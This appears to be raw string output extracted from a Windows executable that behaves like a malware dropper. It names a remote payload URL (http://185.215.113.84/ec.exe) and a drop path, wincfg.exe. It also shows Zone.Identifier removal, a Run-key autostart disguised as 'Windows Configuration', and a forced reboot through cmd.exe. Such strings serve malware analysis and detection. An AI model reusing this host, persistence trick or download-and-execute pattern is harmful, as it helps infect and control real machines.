!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
uYh 0@
u:h 0@
u:h 0@
PathFileExistsW
SHLWAPI.dll
memset
wcslen
MSVCRT.dll
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
InternetCloseHandle
InternetReadFile
InternetOpenUrlW
InternetOpenW
WININET.dll
URLDownloadToFileW
urlmon.dll
CreateProcessW
DeleteFileW
CloseHandle
WriteFile
CreateFileW
ExpandEnvironmentStringsW
SetFileAttributesW
GetTickCount
GetModuleHandleA
GetStartupInfoA
KERNEL32.dll
wsprintfW
USER32.dll
RegCloseKey
RegSetValueExW
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
Y0i0|0
0"1(1[1
2#2.2Z2_2e2n2t2
2B3H3T3a3q3
4'4-494>4D4L4g4m4
5#505;5@5J5Z5_5g5v5|5
6$616C6H6M6Z6
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
%s:Zone.Identifier
%s:Zone.Identifier
%userprofile%
%ls\5tyuuow.txt
%userprofile%
%s\wincfg.exe
http://185.215.113.84/ec.exe
Software\Microsoft\Windows\CurrentVersion\Run\
Windows Configuration
Software\Microsoft\Windows\CurrentVersion\Run\
Windows Configuration
/c shutdown /r
cmd.exe